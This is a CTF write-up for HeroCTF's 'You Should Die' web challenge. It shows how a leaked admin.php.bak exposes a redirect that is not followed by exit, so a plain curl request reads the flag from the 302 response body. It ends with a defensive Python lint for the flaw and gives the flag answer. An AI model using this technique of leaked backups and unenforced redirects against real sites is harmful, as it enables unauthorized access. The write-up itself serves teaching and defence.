Posted on April 26, 2021

You Should Die - HeroCTF.fr

You will need

  • Web browser
  • Curl command


We go to the address given to us - http://chall1.heroctf.fr:9000/. Here, if we open DevTools, we can find an interesting comment inside the body element.

<body id="page-top">
    <!-- For developper :
         Do not forget to remove admin.php.bak !
         Security Team -->

We now know that admin.php.bak was never removed, so we fetch it and look at what the admin.php code looks like - http://chall1.heroctf.fr:9000/admin.php.bak


<?php
if (session_status() == PHP_SESSION_NONE) {
    session_start();   // assumed: the body of this block is cut off in the recovered backup
}

if (!(isset($_SESSION["logged"]) && $_SESSION["logged"] === true)) {
    header("Location: /index.php?error=You are not admin !");
    // no exit()/die() here, so execution continues for non-admins
}

echo "Flag : " . getenv("FLAG_MARK3TING");

Here we can see that the flag is printed by /admin.php. The code checks whether we are logged in and, if we are not, redirects us to /index.php. Redirect is the key word here: header() only adds a Location header to the response, and because the script never calls exit() or die() afterwards (hence the challenge name), PHP keeps running and still writes the flag into the body of the 302 response. A browser follows the redirect and never shows that body, but curl without -L does not follow the Location header, so it simply prints what the server sent.

$ curl http://chall1.heroctf.fr:9000/admin.php
Flag : Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}
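As an added example (not part of the original write-up), here is a small Python lint that flags header("Location: ...") calls that are not followed by exit or die before their enclosing block closes, run against the admin.php.bak logic recovered above and a hardened variant. The regexes and the brace tracking are a heuristic of my own, not a PHP parser.

```python
import re

# Constructed samples: the admin.php.bak logic from the write-up, and the same
# code with the missing exit added right after the redirect.
VULNERABLE_PHP = """<?php
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
if (!(isset($_SESSION["logged"]) && $_SESSION["logged"] === true)) {
    header("Location: /index.php?error=You are not admin !");
}
echo "Flag : " . getenv("FLAG_MARK3TING");
"""

FIXED_PHP = VULNERABLE_PHP.replace(
    'header("Location: /index.php?error=You are not admin !");',
    'header("Location: /index.php?error=You are not admin !");\n    exit;',
)

# Heuristic patterns: a Location header call, and a script terminator.
HEADER_RE = re.compile(r'header\s*\(\s*["\']Location:', re.IGNORECASE)
TERMINATE_RE = re.compile(r"\b(exit|die)\b")


def unterminated_redirects(php_source):
    """Return 1-based line numbers of Location redirects that are not followed
    by exit/die before the enclosing block closes (or the file ends)."""
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        if not HEADER_RE.search(line) or TERMINATE_RE.search(line):
            continue  # not a redirect, or already terminated on the same line
        depth = 0          # nesting relative to the redirect's own block
        terminated = False
        for follow in lines[idx + 1:]:
            stripped = follow.strip()
            if depth == 0 and stripped.startswith("}"):
                break      # block closed without exit/die: execution falls through
            if TERMINATE_RE.search(stripped):
                terminated = True
                break
            depth += stripped.count("{") - stripped.count("}")
        if not terminated:
            findings.append(idx + 1)
    return findings


if __name__ == "__main__":
    print("vulnerable:", unterminated_redirects(VULNERABLE_PHP))  # [6]
    print("fixed:     ", unterminated_redirects(FIXED_PHP))       # []
```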


Flag: Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}



CC BY 4.0 WaletSec + mble